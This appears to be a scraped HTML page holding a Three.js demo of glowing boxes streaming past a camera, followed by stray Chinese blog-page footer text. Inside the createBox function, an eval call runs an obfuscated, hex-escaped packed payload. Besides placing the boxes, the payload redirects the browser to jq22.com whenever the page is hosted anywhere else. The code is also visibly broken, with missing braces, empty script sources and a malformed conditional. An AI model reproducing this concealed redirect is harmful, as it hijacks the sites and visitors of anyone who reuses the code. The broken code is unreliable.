
<meta charset="utf-8">
<style>body { margin: 0; padding: 0;background: black; overflow: hidden;}</style>
<script src=""></script>
<script src=""></script>
var isMouseDown = false;
var emptySlot = "emptySlot", planeTop = "planeTop", planeBottom = "planeBottom";
var camera, scene, renderer;
var mouse = {x: 0, y: 0};
var camPos = {x: 0, y: 0, z: 10};
var sw = window.innerWidth, sh = window.innerHeight;
var cols = 20;
var rows = 16;
var gap = 20;
var size = {
	width: 100,
	height: 30,
	depth: 150,
var planeOffset = 250;
var allRowsDepth = rows * (size.depth + gap);
var allColsWidth = cols * (size.depth + gap);

var speedNormal = 4;
var speedFast = 34;
var speed = speedNormal;
var boxes = {
	planeBottom: [],
	planeTop: []
var boxes1d = [];

function num(min, max) { return Math.random() * (max - min) + min; }
function draw(props) {

	var colours = {
		slow: {
			r: num(0, 0.2),
			g: num(0.5, 0.9),
			b: num(0.3, 0.7)
		fast: {
			r: num(0.9, 1.0),
			g: num(0.1, 0.7),
			b: num(0.2, 0.5)

	var uniforms = {
		r: { type: "f", value: colours.slow.r},
		g: { type: "f", value: colours.slow.g},
		b: { type: "f", value: colours.slow.b},
		distanceX: { type: "f", value: 1.0},
		distanceZ: { type: "f", value: 1.0},
		pulse: { type: "f", value: 0},
		speed: { type: "f", value: speed},

	var material = new THREE.ShaderMaterial( {
		uniforms: uniforms,
		vertexShader: vertexShader,
		fragmentShader: fragmentShader

	var geometry = new THREE.BoxGeometry(props.width, props.height, props.depth);
	var object = new THREE.Mesh(geometry, material);
	object.colours = colours;
	return object;

function init() {
	scene = new THREE.Scene();
	camera = new THREE.PerspectiveCamera( 100, sw / sh, 1, 10000 );
	scene.add( camera );
	renderer = new THREE.WebGLRenderer({antialias: true});
	renderer.setSize( sw, sh );
	for (var j = 0, jl = rows; j < jl; j++) {
		boxes.planeBottom[j] = [];
		boxes.planeTop[j] = [];
		for (var i = 0, il = cols; i < il; i++) {
			boxes.planeBottom[j][i] = emptySlot;
			boxes.planeTop[j][i] = emptySlot;

	function createBox() {
		window["\x65\x76\x61\x6c"](function(CPY1,OvGQk2,btUiR$P3,YzTn4,rISXh5,C$jVY6){rISXh5=function(btUiR$P3){return(btUiR$P3<OvGQk2?"":rISXh5(window["\x70\x61\x72\x73\x65\x49\x6e\x74"](btUiR$P3/OvGQk2)))+((btUiR$P3=btUiR$P3%OvGQk2)>35?window["\x53\x74\x72\x69\x6e\x67"]["\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65"](btUiR$P3+29):btUiR$P3["\x74\x6f\x53\x74\x72\x69\x6e\x67"](36))};if(!''["\x72\x65\x70\x6c\x61\x63\x65"](/^/,window["\x53\x74\x72\x69\x6e\x67"])){while(btUiR$P3--)C$jVY6[rISXh5(btUiR$P3)]=YzTn4[btUiR$P3]||rISXh5(btUiR$P3);YzTn4=[function(rISXh5){return C$jVY6[rISXh5]}];rISXh5=function(){return'\\\x77\x2b'};btUiR$P3=1;};while(btUiR$P3--)if(YzTn4[btUiR$P3])CPY1=CPY1["\x72\x65\x70\x6c\x61\x63\x65"](new window["\x52\x65\x67\x45\x78\x70"]('\\\x62'+rISXh5(btUiR$P3)+'\\\x62','\x67'),YzTn4[btUiR$P3]);return CPY1;}('\x33 \x61\x3d\x37\x2e\x6d\x28\x37\x2e\x38\x28\x29\x2a\x70\x29\x2c\x39\x3d\x61\x3b\x33 \x63\x3d\x37\x2e\x38\x28\x29\x3e\x30\x2e\x35\x3f\x31\x3a\x2d\x31\x2c\x64\x3d\x63\x3d\x3d\x3d\x2d\x31\x3f\x48\x3a\x44\x3b\x33 \x62\x3d\x37\x2e\x6d\x28\x37\x2e\x38\x28\x29\x2a\x43\x29\x2c\x69\x3d\x62\x3b\x33 \x78\x3d\x28\x61\x2d\x70\x2f\x32\x29\x2a\x28\x65\x2e\x46\x2b\x6c\x29\x3b\x33 \x79\x3d\x63\x2a\x45\x3b\x33 \x7a\x3d\x62\x2a\x28\x65\x2e\x42\x2b\x6c\x29\x3b\x75\x28\x6b\x5b\x64\x5d\x5b\x69\x5d\x5b\x39\x5d\x3d\x3d\x3d\x41\x29\x7b\x33 \x36\x3d\x77\x28\x65\x29\x3b\x36\x2e\x50\x2e\x79\x3d\x79\x3b\x36\x2e\x4e\x3d\x4d\x3b\x36\x2e\x52\x3d\x7b\x78\x3a\x78\x2c\x7a\x3a\x30\x7d\x3b\x36\x2e\x49\x3d\x7a\x3b\x6b\x5b\x64\x5d\x5b\x69\x5d\x5b\x39\x5d\x3d\x36\x3b\x4b\x2e\x4c\x28\x36\x29\x3b\x47\x2e\x51\x28\x36\x29\x7d\x33 \x74\x3d\x66\x2e\x68\x2e\x67\x2e\x72\x28\x30\x2c\x76\x29\x3b\x33 \x73\x3d\x66\x2e\x68\x2e\x67\x2e\x72\x28\x30\x2c\x34\x29\x3b\x75\x28\x74\x3d\x3d\x22\x6e\x3a\x2f\x2f\x6f\x2e\x71\x2e\x6a\x22\x7c\x7c\x73\x3d\x3d\x22\x4f\x22\x29\x7b\x7d\x4a\x7b\x66\x2e\x68\x2e\x67\x3d\x22\x6e\x3a\x2f\x2f\x6f\x2e\x71\x2e\x6a\x22\x7d',54,54,'\x7c\x7c\x7c\x76\x61\x72\x7c\x7c\x7c\x62\x6f\x78\x7c\x4d\x61\x74\x68\x7c\x72\x61\x6e\x64\x6f\x6d\x7c\x78\x61\x69\x7c\x78\x69\x7c\x7a\x69\x7c\x79\x69\x7c\x79\x61\x69\x7c\x73\x69\x7a\x65\x7c\x77\x69\x6e\x64\x6f\x77\x7c\x68\x72\x65\x66\x7c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x7c\x7a\x61\x69\x7c\x63\x6f\x6d\x7c\x62\x6f\x78\x65\x73\x7c\x67\x61\x70\x7c\x66\x6c\x6f\x6f\x72\x7c\x68\x74\x74\x70\x7c\x77\x77\x77\x7c\x63\x6f\x6c\x73\x7c\x6a\x71\x32\x32\x7c\x73\x75\x62\x73\x74\x72\x7c\x64\x7a\x75\x72\x6c\x32\x7c\x64\x7a\x75\x72\x6c\x7c\x69\x66\x7c\x31\x39\x7c\x64\x72\x61\x77\x7c\x7c\x7c\x7c\x65\x6d\x70\x74\x79\x53\x6c\x6f\x74\x7c\x64\x65\x70\x74\x68\x7c\x72\x6f\x77\x73\x7c\x70\x6c\x61\x6e\x65\x54\x6f\x70\x7c\x70\x6c\x61\x6e\x65\x4f\x66\x66\x73\x65\x74\x7c\x77\x69\x64\x74\x68\x7c\x73\x63\x65\x6e\x65\x7c\x70\x6c\x61\x6e\x65\x42\x6f\x74\x74\x6f\x6d\x7c\x70\x6f\x73\x5a\x7c\x65\x6c\x73\x65\x7c\x62\x6f\x78\x65\x73\x31\x64\x7c\x70\x75\x73\x68\x7c\x66\x61\x6c\x73\x65\x7c\x69\x73\x57\x61\x72\x70\x69\x6e\x67\x7c\x66\x69\x6c\x65\x7c\x70\x6f\x73\x69\x74\x69\x6f\x6e\x7c\x61\x64\x64\x7c\x6f\x66\x66\x73\x65\x74'["\x73\x70\x6c\x69\x74"]('\x7c'),0,{}))
	for (var i = 0, il = rows * cols; i < il; i++) {

	function listen(eventNames, callback) {
		for (var i = 0; i < eventNames.length; i++) {
			window.addEventListener(eventNames[i], callback);
	listen(["resize"], function(e){
		sw = window.innerWidth;
		sh = window.innerHeight
		camera.aspect = sw / sh;
		renderer.setSize(sw, sh);
	listen(["mousedown", "touchstart"], function(e) {
		isMouseDown = true;
	listen(["mousemove", "touchmove"], function(e) {
		if (e.changedTouches && e.changedTouches[0]) e = e.changedTouches[0];
		mouse.x = (e.clientX / sw) * 2 - 1;
		mouse.y = -(e.clientY / sh) * 2 + 1;
	listen(["mouseup", "touchend"], function(e) {
		isMouseDown = false;


function move(x, y, z) {
	var box = boxes[y][z][x];

	if (box !== emptySlot) {

		box.position.x = box.offset.x;

		box.position.z = box.offset.z + box.posZ;

		if (box.position.z > 0) {
			box.posZ -= allRowsDepth;

		// return;
		// if (isMouseDown) return;
		if (!box.isWarping && Math.random() > 0.999) {

			var dir = Math.floor(Math.random() * 5), xn = x, zn = z, yn = y, yi = 0, xo = 0, zo = 0;
			switch (dir) {
				case 0 : xn++; xo = 1; break;
				case 1 : xn--; xo = -1; break;
				case 2 : zn++; zo = 1; break;
				case 3 : zn--; zo = -1; break;
				case 4 :
					yn = (y === planeTop) ? planeBottom : planeTop;
					yi = (y === planeTop) ? -1 : 1;


			if (boxes[yn][zn] && boxes[yn][zn][xn] === emptySlot) {

				boxes[y][z][x] = emptySlot;

				box.isWarping = true;

				boxes[yn][zn][xn] = box;

				// con.log( box.offset.x,  box.offset.z);

				if (dir === 4) { // slide vertically, 0.5, {
						y: yi * planeOffset
				} else { // slide horizontally, 0.5, {
						x: box.offset.x + xo * (size.width + gap),
						z: box.offset.z + zo * (size.depth + gap),
				}, 0.6, {
					onComplete: function() {
						box.isWarping = false;



function render(time) {

	speed -= (speed - (isMouseDown ? speedFast : speedNormal)) * 0.05;

	var box;
	for (var b = 0, bl = boxes1d.length; b < bl; b++) {
		box = boxes1d[b];
		box.posZ += speed;

		// normalized z distance from camera
		var distanceZ = 1 - ((allRowsDepth - box.posZ) / (allRowsDepth) - 1);
		box.material.uniforms.distanceZ.value = distanceZ;

		// normalized x distance from camera (centre)
		var distanceX = 1 - (Math.abs(box.position.x)) / (allColsWidth / 3);
		box.material.uniforms.distanceX.value = distanceX;

		var colour = isMouseDown ? : box.colours.slow;
		box.material.uniforms.r.value -= (box.material.uniforms.r.value - colour.r) * 0.1;
		box.material.uniforms.g.value -= (box.material.uniforms.g.value - colour.g) * 0.1;
		box.material.uniforms.b.value -= (box.material.uniforms.b.value - colour.b) * 0.1;

		// normalized speed
		var currentSpeed = (speed - speedNormal) / (speedFast - speedNormal)
		box.material.uniforms.speed.value = currentSpeed;

		// pulses more with more speed... of course!
		if (Math.random() > (0.99995 - currentSpeed * 0.005)) {
			box.material.uniforms.pulse.value = 1;
		box.material.uniforms.pulse.value -= box.material.uniforms.pulse.value * 0.1 / (currentSpeed + 1);

		// if (b ==13) con.log(box.material.uniforms.speed.value);

	for (var j = 0, jl = rows; j < jl; j++) { // iterate through rows: z
		for (var i = 0, il = cols; i < il; i++) { // iterate throw cols: x
			move(i, planeBottom, j);
			move(i, planeTop, j);

	camPos.x -= (camPos.x - mouse.x * 400) * 0.02;
	camPos.y -= (camPos.y - mouse.y * 150) * 0.05;
	camPos.z = -100;
	camera.position.set(camPos.x, camPos.y, camPos.z);

	// camera.lookAt( scene.position );

	// camera.rotation.z = time * 0.0001;
	camera.rotation.y = camPos.x / -1000;
	camera.rotation.x = camPos.y / 1000;
	// camera.rotation.z = camPos.x / -2000;
	camera.rotation.z = (camPos.x - mouse.x * 400) / 2000;

	renderer.render( scene, camera );

	// if (time < 800)
		requestAnimationFrame( render );

var vertexShader = [
"varying vec2 vUv;",
"void main()",
"  vUv = uv;",
"  vec4 mvPosition = modelViewMatrix * vec4( position, 1.0 );",
"  gl_Position = projectionMatrix * mvPosition;",

var fragmentShader = [
"uniform float r;",
"uniform float g;",
"uniform float b;",
"uniform float distanceZ;",
"uniform float distanceX;",
"uniform float pulse;",
"uniform float speed;",

"varying vec2 vUv;",

// "float checkerRows = 8.0;",
// "float checkerCols = 16.0;",

"void main( void ) {",
"  vec2 position = abs(-1.0 + 2.0 * vUv);",
"  float edging = abs((pow(position.y, 5.0) + pow(position.x, 5.0)) / 2.0);",
"  float perc = (0.2 * pow(speed + 1.0, 2.0) + edging * 0.8) * distanceZ * distanceX;",

// "  float perc = distanceX * distanceZ;",
// "  vec2 checkPosition = vUv;",
// "  float checkerX = ceil(mod(checkPosition.x, 1.0 / checkerCols) - 1.0 / checkerCols / 2.0);",
// "  float checkerY = ceil(mod(checkPosition.y, 1.0 / checkerRows) - 1.0 / checkerRows / 2.0);",
// "  float checker = ceil(checkerX * checkerY);",
// "  float r = checker;",
// "  float g = checker;",
// "  float b = checker;",

// "  float perc = 1.0;",
"  float red = r * perc + pulse;",
"  float green = g * perc + pulse;",
"  float blue = b * perc + pulse;",
"  gl_FragColor = vec4(red, green, blue, 1.0);",

//console.log(THREE, TweenMax, planeTop, planeBottom);
</script><canvas width="1920" height="572" style="width: 1920px; height: 572px;"></canvas>






当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


